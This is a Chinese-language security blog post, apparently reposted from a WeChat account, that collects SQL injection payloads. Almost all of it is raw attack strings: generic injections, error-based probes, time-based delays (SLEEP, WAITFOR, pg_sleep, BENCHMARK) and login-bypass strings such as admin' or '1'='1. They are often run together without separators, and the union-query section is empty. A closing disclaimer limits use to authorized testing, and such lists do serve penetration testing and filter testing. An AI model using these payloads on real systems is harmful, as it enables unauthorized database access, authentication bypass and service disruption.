分享 | SQL注入Payload汇总
2023-6-12 09:10:35 Author: 编码安全研究(查看原文) 阅读量:19 收藏

通用 SQL 注入负载

'''```,"""///\\\;' or "-- or # ' OR '1' OR 1 -- -" OR "" = "" OR 1 = 1 -- -' OR '' = ''=''LIKE''=0--+ OR 1=1' OR 'x'='x' AND id IS NULL; --'''''''''''''UNION SELECT '2%00/*…*/ +    addition, concatenate (or space in url)||    (double pipe) concatenate%    wildcard attribute indicator
@variable local variable@@variable global variable

# NumericAND 1AND 0AND trueAND false1-false1-true1*56-2

1' ORDER BY 1--+1' ORDER BY 2--+1' ORDER BY 3--+
1' ORDER BY 1,2--+1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+1' GROUP BY 1,2,3--+' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Finding the table name

Time-Based:,(select * from (select(sleep(10)))a)%2c(select%20*%20from%20(select(sleep(10)))a)';WAITFOR DELAY '0:0:30'--
Comments:
# Hash comment/* C-style comment-- - SQL comment;%00 Nullbyte` Backtick

基于通用错误的有效负载

 OR 1=1 OR 1=0 OR x=x OR x=y OR 1=1# OR 1=0# OR x=x# OR x=y# OR 1=1--  OR 1=0--  OR x=x--  OR x=y--  OR 3409=3409 AND ('pytW' LIKE 'pytW OR 3409=3409 AND ('pytW' LIKE 'pytY HAVING 1=1 HAVING 1=0 HAVING 1=1# HAVING 1=0# HAVING 1=1--  HAVING 1=0--  AND 1=1 AND 1=0 AND 1=1--  AND 1=0--  AND 1=1# AND 1=0# AND 1=1 AND '%'=' AND 1=0 AND '%'=' AND 1083=1083 AND (1427=1427 AND 7506=9091 AND (5913=5913 AND 1083=1083 AND ('1427=1427 AND 7506=9091 AND ('5913=5913 AND 7300=7300 AND 'pKlZ'='pKlZ AND 7300=7300 AND 'pKlZ'='pKlY AND 7300=7300 AND ('pKlZ'='pKlZ AND 7300=7300 AND ('pKlZ'='pKlY AS INJECTX WHERE 1=1 AND 1=1 AS INJECTX WHERE 1=1 AND 1=0 AS INJECTX WHERE 1=1 AND 1=1# AS INJECTX WHERE 1=1 AND 1=0# AS INJECTX WHERE 1=1 AND 1=1-- AS INJECTX WHERE 1=1 AND 1=0-- WHERE 1=1 AND 1=1 WHERE 1=1 AND 1=0 WHERE 1=1 AND 1=1# WHERE 1=1 AND 1=0# WHERE 1=1 AND 1=1-- WHERE 1=1 AND 1=0-- ORDER BY 1--  ORDER BY 2--  ORDER BY 3--  ORDER BY 4--  ORDER BY 5--  ORDER BY 6--  ORDER BY 7--  ORDER BY 8--  ORDER BY 9--  ORDER BY 10--  ORDER BY 11--  ORDER BY 12--  ORDER BY 13--  ORDER BY 14--  ORDER BY 15--  ORDER BY 16--  ORDER BY 17--  ORDER BY 18--  ORDER BY 19--  ORDER BY 20--  ORDER BY 21--  ORDER BY 22--  ORDER BY 23--  ORDER BY 24--  ORDER BY 25--  ORDER BY 26--  ORDER BY 27--  ORDER BY 28--  ORDER BY 29--  ORDER BY 30--  ORDER BY 31337--  ORDER BY 1#  ORDER BY 2#  ORDER BY 3#  ORDER BY 4#  ORDER BY 5#  ORDER BY 6#  ORDER BY 7#  ORDER BY 8#  ORDER BY 9#  ORDER BY 10#  ORDER BY 11#  ORDER BY 12#  ORDER BY 13#  ORDER BY 14#  ORDER BY 15#  ORDER BY 16#  ORDER BY 17#  ORDER BY 18#  ORDER BY 19#  ORDER BY 20#  ORDER BY 21#  ORDER BY 22#  ORDER BY 23#  ORDER BY 24#  ORDER BY 25#  ORDER BY 26#  ORDER BY 27#  ORDER BY 28#  ORDER BY 29#  ORDER BY 30# ORDER BY 31337# ORDER BY 1  ORDER BY 2  ORDER BY 3  ORDER BY 4  ORDER BY 5  ORDER BY 6  ORDER BY 7  ORDER BY 8  ORDER BY 9  ORDER BY 10  ORDER BY 11  ORDER BY 12  ORDER BY 13  ORDER BY 14  ORDER BY 15  ORDER BY 16  ORDER BY 17  ORDER BY 18  ORDER BY 19  ORDER BY 20  ORDER BY 21  ORDER BY 22  ORDER BY 23  ORDER BY 24  ORDER BY 25  ORDER BY 26  ORDER BY 27  ORDER BY 28  ORDER BY 29  ORDER BY 30  ORDER BY 31337  RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--%' AND 8310=8310 AND '%'='%' AND 8310=8311 AND '%'=' and (select substring(@@version,1,1))='X' and (select substring(@@version,1,1))='M' and (select substring(@@version,2,1))='i' and (select substring(@@version,2,1))='y' and (select substring(@@version,3,1))='c' and (select substring(@@version,3,1))='S' and (select substring(@@version,3,1))='X'

基于时间的通用 SQL 注入负载

sleep(5)#1 or sleep(5)#" or sleep(5)#' or sleep(5)#" or sleep(5)="' or sleep(5)='1) or sleep(5)#") or sleep(5)="') or sleep(5)='1)) or sleep(5)#")) or sleep(5)="')) or sleep(5)=';waitfor delay '0:0:5'--);waitfor delay '0:0:5'--';waitfor delay '0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfor delay '0:0:5'--));waitfor delay '0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--benchmark(10000000,MD5(1))#1 or benchmark(10000000,MD5(1))#" or benchmark(10000000,MD5(1))#' or benchmark(10000000,MD5(1))#1) or benchmark(10000000,MD5(1))#") or benchmark(10000000,MD5(1))#') or benchmark(10000000,MD5(1))#1)) or benchmark(10000000,MD5(1))#")) or benchmark(10000000,MD5(1))#')) or benchmark(10000000,MD5(1))#pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--' or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxeAND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#SLEEP(5)#SLEEP(5)--SLEEP(5)="SLEEP(5)='or SLEEP(5)or SLEEP(5)#or SLEEP(5)--or SLEEP(5)="or SLEEP(5)='waitfor delay '00:00:05'waitfor delay '00:00:05'--waitfor delay '00:00:05'#benchmark(50000000,MD5(1))benchmark(50000000,MD5(1))--benchmark(50000000,MD5(1))#or benchmark(50000000,MD5(1))or benchmark(50000000,MD5(1))--or benchmark(50000000,MD5(1))#pg_SLEEP(5)pg_SLEEP(5)--pg_SLEEP(5)#or pg_SLEEP(5)or pg_SLEEP(5)--or pg_SLEEP(5)#'\"AnD SLEEP(5)AnD SLEEP(5)--AnD SLEEP(5)#&&SLEEP(5)&&SLEEP(5)--&&SLEEP(5)#' AnD SLEEP(5) ANd '1'&&SLEEP(5)&&'1ORDER BY SLEEP(5)ORDER BY SLEEP(5)--ORDER BY SLEEP(5)#(SELECT * FROM (SELECT(SLEEP(5)))ecMj)(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--+benchmark(3200,SHA1(1))+'+ SLEEP(10) + 'RANDOMBLOB(500000000/2)AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))RANDOMBLOB(1000000000/2)AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

通用联合查询有效负载


SQL 注入身份验证绕过有效负载

'-'' ''&''^''*'' or ''-'' or '' '' or ''&'' or ''^'' or ''*'"-"" ""&""^""*"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("xor 1=1or 1=1--or 1=1#or 1=1/*admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin' or '1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055admin" --admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

文章来源:khan安全攻防实验室

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权否则需自行承担,本公众号及原作者不承担相应的后果.

注:如有侵权请联系删除

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧。

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY1MDc2Mg==&mid=2247503234&idx=2&sn=b82feda03bc9f8e3ff476a9819d309d1&chksm=ce649ee7f91317f152e0d347384dbdea0526c530b96ea9bda45e19a31565a44fb3d9c6c4e97d#rd
如有侵权请联系:admin#unsafe.sh